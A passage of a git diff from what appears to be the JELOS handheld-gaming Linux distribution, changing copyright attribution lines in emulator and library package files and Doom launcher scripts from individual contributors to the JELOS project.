GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2019-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="mpfr" PKG_VERSION="4.2.0" diff --git a/packages/devel/ncurses/package.mk b/packages/devel/ncurses/package.mk index 39214d349..38abdc499 100644 --- a/packages/devel/ncurses/package.mk +++ b/packages/devel/ncurses/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2017-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="ncurses" PKG_VERSION="6.4" diff --git a/packages/devel/qt5/package.mk b/packages/devel/qt5/package.mk index eb46df9c4..bd42434f3 100644 --- a/packages/devel/qt5/package.mk +++ b/packages/devel/qt5/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2018-present Frank Hartung (supervisedthinking @ gmail.com) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="qt5" PKG_VERSION="8e65ddffeaf77b312c26d3097c26e525b7c5e220" diff --git a/packages/emulators/libretro/a5200-lr/package.mk b/packages/emulators/libretro/a5200-lr/package.mk index e9331f765..e3681f5bc 100644 --- a/packages/emulators/libretro/a5200-lr/package.mk +++ b/packages/emulators/libretro/a5200-lr/package.mk @@ -1,7 +1,7 @@ ################################################################################ # This file is part of OpenELEC - http://www.openelec.tv # Copyright (C) 2009-2012 Stephan Raue (stephan@openelec.tv) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # # This Program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by diff --git a/packages/emulators/libretro/arduous-lr/package.mk b/packages/emulators/libretro/arduous-lr/package.mk index e518f0167..b544c8751 100644 --- a/packages/emulators/libretro/arduous-lr/package.mk +++ b/packages/emulators/libretro/arduous-lr/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="arduous-lr" PKG_VERSION="aed50506962df6f965748e888b3fe7027ddb410d" diff --git a/packages/emulators/libretro/atari800-lr/package.mk b/packages/emulators/libretro/atari800-lr/package.mk index 104da0af9..ad32b658f 100644 --- a/packages/emulators/libretro/atari800-lr/package.mk +++ b/packages/emulators/libretro/atari800-lr/package.mk @@ -1,7 +1,7 @@ ################################################################################ # This file is part of OpenELEC - http://www.openelec.tv # Copyright (C) 2009-2012 Stephan Raue (stephan@openelec.tv) -# Copyright (C) 2009-2012 Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # # This Program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by diff --git a/packages/emulators/libretro/beetle-psx-lr/package.mk b/packages/emulators/libretro/beetle-psx-lr/package.mk index 2605d24db..4ad78afd7 100644 --- a/packages/emulators/libretro/beetle-psx-lr/package.mk +++ b/packages/emulators/libretro/beetle-psx-lr/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="beetle-psx-lr" PKG_VERSION="9d07ee164ce18d5c98a12c1fb48d637306d4e8ee" diff --git a/packages/emulators/libretro/beetle-saturn-lr/package.mk b/packages/emulators/libretro/beetle-saturn-lr/package.mk index 43eb28ad4..e5debef76 100644 --- a/packages/emulators/libretro/beetle-saturn-lr/package.mk +++ b/packages/emulators/libretro/beetle-saturn-lr/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="beetle-saturn-lr" PKG_VERSION="cd395e9e3ee407608450ebc565e871b24e7ffed6" diff --git a/packages/emulators/libretro/boom3-lr/package.mk b/packages/emulators/libretro/boom3-lr/package.mk index 236363bbf..0a87995a7 100644 --- a/packages/emulators/libretro/boom3-lr/package.mk +++ b/packages/emulators/libretro/boom3-lr/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0 -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="boom3-lr" PKG_VERSION="0bea79abf5ec8262dfe9af73cb8c54ea6e2aeb98" diff --git a/packages/emulators/libretro/boom3-lr/scripts/Doom 3 - Resurrection of Evil.sh b/packages/emulators/libretro/boom3-lr/scripts/Doom 3 - Resurrection of Evil.sh index 23048d225..319ca47b5 100644 --- a/packages/emulators/libretro/boom3-lr/scripts/Doom 3 - Resurrection of Evil.sh +++ b/packages/emulators/libretro/boom3-lr/scripts/Doom 3 - Resurrection of Evil.sh @@ -1,4 +1,4 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) /usr/bin/retroarch -L /usr/lib/libretro/boom3_xp_libretro.so /storage/roms/idtech/doom3/d3xp/pak000.pk4 diff --git a/packages/emulators/libretro/boom3-lr/scripts/Doom 3.sh b/packages/emulators/libretro/boom3-lr/scripts/Doom 3.sh index 035919f78..fd3bf4f6e 100644 --- a/packages/emulators/libretro/boom3-lr/scripts/Doom 3.sh +++ b/packages/emulators/libretro/boom3-lr/scripts/Doom 3.sh @@ -1,4 +1,4 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) /usr/bin/retroarch -L /usr/lib/libretro/boom3_libretro.so /storage/roms/idtech/doom3/base/pak000.pk4 diff --git a/packages/emulators/libretro/bsnes-lr/package.mk b/packages/emulators/libretro/bsnes-lr/package.mk index 3124f9874..e2852a2c8 100644 --- a/packages/emulators/libretro/bsnes-lr/package.mk +++ b/packages/emulators/libretro/bsnes-lr/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0 -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="bsnes-lr" PKG_VERSION="e71eca1199d1359af53c806811dc3f05c64f8d91" diff --git a/packages/emulators/libretro/bsnes-mercury-performance-lr/package.mk b/packages/emulators/libretro/bsnes-mercury-performance-lr/package.mk index 0d9a6c645..55ce1ef00 100644 --- a/packages/emulators/libretro/bsnes-mercury-performance-lr/package.mk +++ b/packages/emulators/libretro/bsnes-mercury-performance-lr/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0 -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="bsnes-mercury-performance-lr" PKG_VERSION="fb9a41fe9bc230a07c4506cad3cbf21d3fa635b4" diff --git a/packages/emulators/libretro/citra-lr/package.mk b/packages/emulators/libretro/citra-lr/package.mk index fd3f52b58..c63898361 100644 --- a/packages/emulators/libretro/citra-lr/package.mk +++ b/packages/emulators/libretro/citra-lr/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="citra-lr" PKG_VERSION="d7e1612c17b1acb5d5eb68bb046820db49aeea5e" diff --git a/packages/emulators/libretro/common-shaders/package.mk b/packages/emulators/libretro/common-shaders/package.mk index e1dffa982..ab5f84eb4 100644 --- a/packages/emulators/libretro/common-shaders/package.mk +++ b/packages/emulators/libretro/common-shaders/package.mk @@ -2,7 +2,7 @@ # This file is part of OpenELEC - http://www.openelec.tv # Copyright (C) 2009-2012 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2020 351ELEC team (https://github.com/fewtarius/351ELEC) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # # This Program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by diff --git a/packages/emulators/libretro/core-info/package.mk b/packages/emulators/libretro/core-info/package.mk index c9d0f258d..503894f4b 100644 --- a/packages/emulators/libretro/core-info/package.mk +++ b/packages/emulators/libretro/core-info/package.mk @@ -1,7 +1,7 @@ ################################################################################ # This file is part of OpenELEC - http://www.openelec.tv # Copyright (C) 2009-2012 Stephan Raue (stephan@openelec.tv) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # # This Program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by diff --git a/packages/emulators/libretro/desmume-lr/package.mk b/packages/emulators/libretro/desmume-lr/package.mk index 87a5a7f69..9f08a4265 100644 --- a/packages/emulators/libretro/desmume-lr/package.mk +++ b/packages/emulators/libretro/desmume-lr/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="desmume-lr" PKG_VERSION="cf0fcc6ea4a85b7491bdf9adc7bf09748b4be7da" diff --git a/packages/emulators/libretro/dolphin-lr/package.mk b/packages/emulators/libretro/dolphin-lr/package.mk index 67a69907d..ebb937e2e 100644 --- a/packages/emulators/libretro/dolphin-lr/package.mk +++ b/packages/emulators/libretro/dolphin-lr/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="dolphin-lr" PKG_VERSION="2f4b0f7902257d40a054f60b2c670d6e314f2a04" diff --git a/packages/emulators/libretro/dosbox-svn-lr/package.mk b/packages/emulators/libretro/dosbox-svn-lr/package.mk index cc4acee0c..77bd4bc69 100644 --- a/packages/emulators/libretro/dosbox-svn-lr/package.mk +++ b/packages/emulators/libretro/dosbox-svn-lr/package.mk @@ -1,7 +1,7 @@ ################################################################################ # This file is part of OpenELEC - http://www.openelec.tv # Copyright (C) 2009-2012 Stephan Raue (stephan@openelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # # This Program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by diff --git a/packages/emulators/libretro/duckstation-lr/package.mk b/packages/emulators/libretro/duckstation-lr/package.mk index ad9c77862..ccdea1fa5 100644 --- a/packages/emulators/libretro/duckstation-lr/package.mk +++ b/packages/emulators/libretro/duckstation-lr/package.mk @@ -1,6 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="duckstation-lr" PKG_VERSION="24c373245ebdab946f11627520edea76e1f23b8e" diff --git a/packages/emulators/libretro/duckstation-lr/patches/001-fix-gcc12-compile.patch b/packages/emulators/libretro/duckstation-lr/patches/001-fix-gcc12-compile.patch index 6276c0d58..b84ca6e14 100644 --- a/packages/emulators/libretro/duckstation-lr/patches/001-fix-gcc12-compile.patch +++ b/packages/emulators/libretro/duckstation-lr/patches/001-fix-gcc12-compile.patch @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) diff --git a/src/core/cpu_core.h b/src/core/cpu_core.h index c9199153..5d82b5c0 100644 diff --git a/packages/emulators/libretro/easyrpg-lr/liblcf/package.mk b/packages/emulators/libretro/easyrpg-lr/liblcf/package.mk index 627a132c1..7de40d73f 100644 --- a/packages/emulators/libretro/easyrpg-lr/liblcf/package.mk +++ b/packages/emulators/libretro/easyrpg-lr/liblcf/package.mk @@ -1,7 +1,7 @@ ################################################################################ # This file is part of OpenELEC - http://www.openelec.tv # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # # OpenELEC is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by diff --git a/packages/emulators/libretro/easyrpg-lr/package.mk b/packages/emulators/libretro/easyrpg-lr/package.mk index c3f092ab8..ebf2e642a 100644 --- a/packages/emulators/libretro/easyrpg-lr/package.mk +++ b/packages/emulators/libretro/easyrpg-lr/package.mk @@ -1,7 +1,7 @@ ################################################################################ # This file is part of OpenELEC - http://www.openelec.tv # Copyright (C) 2009-2012 Stephan Raue (stephan@openelec.tv) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # # This Program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by diff --git a/packages/emulators/libretro/ecwolf-lr/package.mk b/packages/emulators/libretro/ecwolf-lr/package.mk index b6a5d21e8..900368a0e 100644 --- a/packages/emulators/libretro/ecwolf-lr/package.mk +++ b/packages/emulators/libretro/ecwolf-lr/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="ecwolf-lr" PKG_VERSION="18eca17c2d634b154824e0782c6cbbe0a2c9ea76" diff --git a/packages/emulators/libretro/fbneo-lr/package.mk b/packages/emulators/libretro/fbneo-lr/package.mk index b39b00cb0..1973a4c63 100644 --- a/packages/emulators/libretro/fbneo-lr/package.mk +++ b/packages/emulators/libretro/fbneo-lr/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) # Maintenance 2020 351ELEC team (https://github.com/fewtarius/351ELEC) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="fbneo-lr" PKG_VERSION="5fa9b68ab4fa5b318066ac95fd5060357ba35230" diff --git a/packages/emulators/libretro/flycast-lr/package.mk b/packages/emulators/libretro/flycast-lr/package.mk index 3dce64f91..ec0db7f90 100644 --- a/packages/emulators/libretro/flycast-lr/package.mk +++ b/packages/emulators/libretro/flycast-lr/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2022-present AmberELEC (https://github.com/AmberELEC) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="flycast-lr" PKG_VERSION="92a10ba0f0a5ca0d1ec9498962002f4cdcc8e7f6" diff --git a/packages/emulators/libretro/flycast2021-lr/package.mk b/packages/emulators/libretro/flycast2021-lr/package.mk index c179aae96..eb159fe64 100644 --- a/packages/emulators/libretro/flycast2021-lr/package.mk +++ b/packages/emulators/libretro/flycast2021-lr/package.mk @@ -1,7 +1,7 @@ ################################################################################ # This file is part of OpenELEC - http://www.openelec.tv # Copyright (C) 2009-2012 Stephan Raue (stephan@openelec.tv) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # # This Program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by diff --git a/packages/emulators/libretro/freej2me-lr/package.mk b/packages/emulators/libretro/freej2me-lr/package.mk index 8fa6605ae..f8d478052 100644 --- a/packages/emulators/libretro/freej2me-lr/package.mk +++ b/packages/emulators/libretro/freej2me-lr/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2021-present 351ELEC (https://github.com/351ELEC) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="freej2me-lr" PKG_VERSION="d8aa5d9a55a5673b77d5999342143ebdf131bfbd" diff --git a/packages/emulators/libretro/genesis-plus-gx-lr/package.mk b/packages/emulators/libretro/genesis-plus-gx-lr/package.mk index c8dcf3193..505f3f06c 100644 --- a/packages/emulators/libretro/genesis-plus-gx-lr/package.mk +++ b/packages/emulators/libretro/genesis-plus-gx-lr/package.mk @@ -2,7 +2,7 @@ # This file is part of OpenELEC - http://www.openelec.tv # Copyright (C) 2009-2012 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2020 351ELEC team (https://github.com/fewtarius/351ELEC) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # # This Program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by diff --git a/packages/emulators/libretro/glsl-shaders/package.mk b/packages/emulators/libretro/glsl-shaders/package.mk index c64413652..4b3b48b4c 100644 --- a/packages/emulators/libretro/glsl-shaders/package.mk +++ b/packages/emulators/libretro/glsl-shaders/package.mk @@ -2,7 +2,7 @@ # This file is part of OpenELEC - http://www.openelec.tv # Copyright (C) 2009-2012 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2020 351ELEC team (https://github.com/fewtarius/351ELEC) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # # This Program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by diff --git a/packages/emulators/libretro/gpsp-lr/package.mk b/packages/emulators/libretro/gpsp-lr/package.mk index e433a9d7e..4a667ed6a 100644 --- a/packages/emulators/libretro/gpsp-lr/package.mk +++ b/packages/emulators/libretro/gpsp-lr/package.mk @@ -2,7 +2,7 @@ # This file is part of OpenELEC - http://www.openelec.tv # Copyright (C) 2009-2012 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2020 351ELEC team (https://github.com/fewtarius/351ELEC) -# Copyright (C) 2022 Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # # This Program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by diff --git a/packages/emulators/libretro/idtech-lr/package.mk b/packages/emulators/libretro/idtech-lr/package.mk index 79ba03b79..6ffa1cf40 100644 --- a/packages/emulators/libretro/idtech-lr/package.mk +++ b/packages/emulators/libretro/idtech-lr/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="idtech-lr" PKG_LICENSE="Apache-2.0" diff --git a/packages/emulators/libretro/lrps2-lr/package.mk b/packages/emulators/libretro/lrps2-lr/package.mk index e3783a4be..1f95888bf 100644 --- a/packages/emulators/libretro/lrps2-lr/package.mk +++ b/packages/emulators/libretro/lrps2-lr/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="lrps2-lr" PKG_VERSION="f3c8743d6a42fe429f703b476fecfdb5655a98a9" diff --git a/packages/emulators/libretro/mame2003-plus-lr/package.mk b/packages/emulators/libretro/mame2003-plus-lr/package.mk index b7a415109..cd0eab09b 100644 --- a/packages/emulators/libretro/mame2003-plus-lr/package.mk +++ b/packages/emulators/libretro/mame2003-plus-lr/package.mk @@ -2,7 +2,7 @@ # This file is part of OpenELEC - http://www.openelec.tv # Copyright (C) 2009-2012 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2020 351ELEC team (https://github.com/fewtarius/351ELEC) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # # This Program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by diff --git a/packages/emulators/libretro/melonds-lr/package.mk b/packages/emulators/libretro/melonds-lr/package.mk index 26a773020..a695d6bfc 100644 --- a/packages/emulators/libretro/melonds-lr/package.mk +++ b/packages/emulators/libretro/melonds-lr/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="melonds-lr" PKG_VERSION="c6488c88cb4c7583dbcd61609e0eef441572fae8" diff --git a/packages/emulators/libretro/mesen-lr/package.mk b/packages/emulators/libretro/mesen-lr/package.mk index 497311b6f..19b04a472 100644 --- a/packages/emulators/libretro/mesen-lr/package.mk +++ b/packages/emulators/libretro/mesen-lr/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="mesen-lr" PKG_VERSION="d25d60fc190f3f7603a1113ef1e11d9da65b7583" diff --git a/packages/emulators/libretro/minivmac-lr/package.mk b/packages/emulators/libretro/minivmac-lr/package.mk index 6bff8c42e..c02277254 100644 --- a/packages/emulators/libretro/minivmac-lr/package.mk +++ b/packages/emulators/libretro/minivmac-lr/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="minivmac-lr" PKG_VERSION="45edc82baae906b90b67cce66761557923a6ba75" diff --git a/packages/emulators/libretro/mupen64plus-lr/package.mk b/packages/emulators/libretro/mupen64plus-lr/package.mk index 4620ed9d0..1675d875a 100644 --- a/packages/emulators/libretro/mupen64plus-lr/package.mk +++ b/packages/emulators/libretro/mupen64plus-lr/package.mk @@ -1,7 +1,7 @@ ################################################################################ # This file is part of OpenELEC - http://www.openelec.tv # Copyright (C) 2009-2012 Stephan Raue (stephan@openelec.tv) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # # This Program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by diff --git a/packages/emulators/libretro/mupen64plus-nx-lr/package.mk b/packages/emulators/libretro/mupen64plus-nx-lr/package.mk index cdb3ce21c..4edd8d596 100755 --- a/packages/emulators/libretro/mupen64plus-nx-lr/package.mk +++ b/packages/emulators/libretro/mupen64plus-nx-lr/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="mupen64plus-nx-lr" PKG_VERSION="26fd1edd640ff3db49dd5ebb7e54f0de6600fc45" diff --git a/packages/emulators/libretro/parallel-n64-lr/package.mk b/packages/emulators/libretro/parallel-n64-lr/package.mk index bd44b8e6b..305f41cf3 100644 --- a/packages/emulators/libretro/parallel-n64-lr/package.mk +++ b/packages/emulators/libretro/parallel-n64-lr/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="parallel-n64-lr" PKG_VERSION="49eadb4da85f7e3bd59b60f61e8fd5dbfb9f07d5" diff --git a/packages/emulators/libretro/pcsx_rearmed-lr/package.mk b/packages/emulators/libretro/pcsx_rearmed-lr/package.mk index 2846ad092..a58400aa8 100644 --- a/packages/emulators/libretro/pcsx_rearmed-lr/package.mk +++ b/packages/emulators/libretro/pcsx_rearmed-lr/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2020 Trond Haugland (trondah@gmail.com) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="pcsx_rearmed-lr" PKG_VERSION="e34ef5a" diff --git a/packages/emulators/libretro/play-lr/package.mk b/packages/emulators/libretro/play-lr/package.mk index 2853919ea..b66a1d855 100644 --- a/packages/emulators/libretro/play-lr/package.mk +++ b/packages/emulators/libretro/play-lr/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="play-lr" PKG_VERSION="58216c3110abcaf582c6eb9c8fad62ec92945ae6" diff --git a/packages/emulators/libretro/ppsspp-lr/package.mk b/packages/emulators/libretro/ppsspp-lr/package.mk index 82a473e4b..56a69a4df 100644 --- a/packages/emulators/libretro/ppsspp-lr/package.mk +++ b/packages/emulators/libretro/ppsspp-lr/package.mk @@ -1,7 +1,7 @@ ################################################################################ # This file is part of OpenELEC - http://www.openelec.tv # Copyright (C) 2009-2012 Stephan Raue (stephan@openelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # # This Program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by diff --git a/packages/emulators/libretro/prboom-lr/scripts/Doom II.sh b/packages/emulators/libretro/prboom-lr/scripts/Doom II.sh index 3e2c47a1d..26c7f4af2 100644 --- a/packages/emulators/libretro/prboom-lr/scripts/Doom II.sh +++ b/packages/emulators/libretro/prboom-lr/scripts/Doom II.sh @@ -1,4 +1,4 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) /usr/bin/retroarch -L /usr/lib/libretro/prboom_libretro.so /storage/roms/idtech/doom2/Doom2.wad diff --git a/packages/emulators/libretro/prboom-lr/scripts/Doom.sh b/packages/emulators/libretro/prboom-lr/scripts/Doom.sh index 4bc22175a..58dddbce5 100644 --- a/packages/emulators/libretro/prboom-lr/scripts/Doom.sh +++ b/packages/emulators/libretro/prboom-lr/scripts/Doom.sh @@ -1,4 +1,4 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) /usr/bin/retroarch -L /usr/lib/libretro/prboom_libretro.so /storage/roms/idtech/doom/Doom.wad diff --git a/packages/emulators/libretro/puae-lr/package.mk b/packages/emulators/libretro/puae-lr/package.mk index 2dea13c64..280b40e5d 100644 --- a/packages/emulators/libretro/puae-lr/package.mk +++ b/packages/emulators/libretro/puae-lr/package.mk @@ -2,7 +2,7 @@ # This file is part of OpenELEC - http://www.openelec.tv # Copyright (C) 2009-2012 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2020 351ELEC team (https://github.com/fewtarius/351ELEC) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # # This Program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by diff --git a/packages/emulators/libretro/retropie-shaders/package.mk b/packages/emulators/libretro/retropie-shaders/package.mk index 153aab8b7..b4b413ee7 100644 --- a/packages/emulators/libretro/retropie-shaders/package.mk +++ b/packages/emulators/libretro/retropie-shaders/package.mk @@ -2,7 +2,7 @@ # This file is part of OpenELEC - http://www.openelec.tv # Copyright (C) 2009-2012 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2020 351ELEC team (https://github.com/fewtarius/351ELEC) -# Copyright (C) 2022 Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # # This Program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by diff --git a/packages/emulators/libretro/scummvm-lr/package.mk b/packages/emulators/libretro/scummvm-lr/package.mk index f43bcc096..8fe7d78ec 100644 --- a/packages/emulators/libretro/scummvm-lr/package.mk +++ b/packages/emulators/libretro/scummvm-lr/package.mk @@ -1,7 +1,7 @@ ################################################################################ # This file is part of OpenELEC - http://www.openelec.tv # Copyright (C) 2009-2012 Stephan Raue (stephan@openelec.tv) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # # This Program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by diff --git a/packages/emulators/libretro/slang-shaders/package.mk b/packages/emulators/libretro/slang-shaders/package.mk index 36cbf1ce8..a91311713 100644 --- a/packages/emulators/libretro/slang-shaders/package.mk +++ b/packages/emulators/libretro/slang-shaders/package.mk @@ -1,7 +1,7 @@ ################################################################################ # This file is part of OpenELEC - http://www.openelec.tv # Copyright (C) 2009-2012 Stephan Raue (stephan@openelec.tv) -# Copyright (C) 2022-present Fewtarius 